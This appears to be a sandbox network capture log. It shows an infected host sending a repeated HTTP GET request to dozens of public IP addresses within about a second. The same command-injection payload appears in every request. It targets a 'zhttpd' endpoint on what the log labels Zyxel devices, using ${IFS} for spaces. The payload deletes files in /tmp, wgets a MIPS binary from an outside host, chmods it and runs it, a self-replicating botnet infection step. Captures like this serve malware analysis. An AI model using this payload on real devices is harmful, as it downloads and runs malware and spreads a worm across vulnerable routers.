                                        Jan 14, 2024 16:18:39.337325096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2920192.168.2.1344258176.92.7.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337376118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2921192.168.2.1337200195.102.253.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337430000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2922192.168.2.1346144189.25.1.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337480068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2923192.168.2.1348932184.89.67.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337548971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2924192.168.2.1340436129.20.202.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337614059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2925192.168.2.135131686.14.160.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337677002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2926192.168.2.1336986212.59.253.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337719917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2927192.168.2.1340488167.185.23.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337769985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2928192.168.2.1339254193.9.84.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337806940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2929192.168.2.1347954170.173.74.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337878942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2930192.168.2.134032246.82.211.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.338287115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2931192.168.2.1346120176.244.229.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.338735104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2932192.168.2.1340228103.165.141.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.339508057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2933192.168.2.134889490.192.138.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.340265989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2934192.168.2.1348604209.31.218.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.340374947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2935192.168.2.134730823.215.167.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.342252016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2936192.168.2.135348892.163.91.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.342252016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2937192.168.2.135317617.169.59.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343157053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2938192.168.2.135101271.14.171.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343193054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2939192.168.2.1351000199.231.137.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343252897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2940192.168.2.136008817.159.68.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343327045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2941192.168.2.135946095.250.154.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343374014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2942192.168.2.1336698126.150.5.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343436003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2943192.168.2.133803831.237.111.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343497038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2944192.168.2.135229662.131.32.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343550920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2945192.168.2.133282485.136.96.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343580961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2946192.168.2.1338174176.174.231.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343646049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2947192.168.2.135866277.126.138.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343697071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2948192.168.2.1346150148.93.15.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343718052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2949192.168.2.1345828125.222.185.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343806028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2950192.168.2.1345156104.245.41.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.343866110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2951192.168.2.1341342142.209.122.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.345649958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2952192.168.2.1349804112.155.169.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.345773935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2953192.168.2.1353868159.16.107.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.345812082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2954192.168.2.1339752174.171.185.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.345851898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2955192.168.2.1336752138.218.21.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.345910072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2956192.168.2.13462508.161.239.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.345918894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2957192.168.2.133293262.23.196.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.345962048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2958192.168.2.133965243.215.201.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346028090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2959192.168.2.133411836.172.243.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346095085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2960192.168.2.1345826135.240.11.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346096039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2961192.168.2.1345402168.178.238.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346157074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2962192.168.2.1355002109.231.71.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346199989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2963192.168.2.1340626112.233.132.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346215010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2964192.168.2.1335716221.233.7.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346297026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2965192.168.2.134602494.125.133.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346298933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2966192.168.2.133826824.195.103.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346345901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2967192.168.2.1348160131.148.213.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346371889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2968192.168.2.135964271.246.39.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346407890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2969192.168.2.1360086114.93.3.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346441031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2970192.168.2.1342166206.25.217.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346483946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2971192.168.2.135551094.111.131.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346515894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2972192.168.2.1350164119.21.124.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346558094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2973192.168.2.1348512160.211.166.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346596956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2974192.168.2.1341506120.17.44.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346645117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2975192.168.2.1340666152.26.201.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346687078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2976192.168.2.135302254.85.162.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346708059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2977192.168.2.1343408125.166.137.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346749067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2978192.168.2.134649678.41.86.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346803904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2979192.168.2.1360280175.237.143.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346848011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2980192.168.2.1338098212.107.213.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346903086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2981192.168.2.134108017.183.226.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.346935034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2982192.168.2.1347354104.93.146.205443
                                        TimestampBytes transferredDirectionData
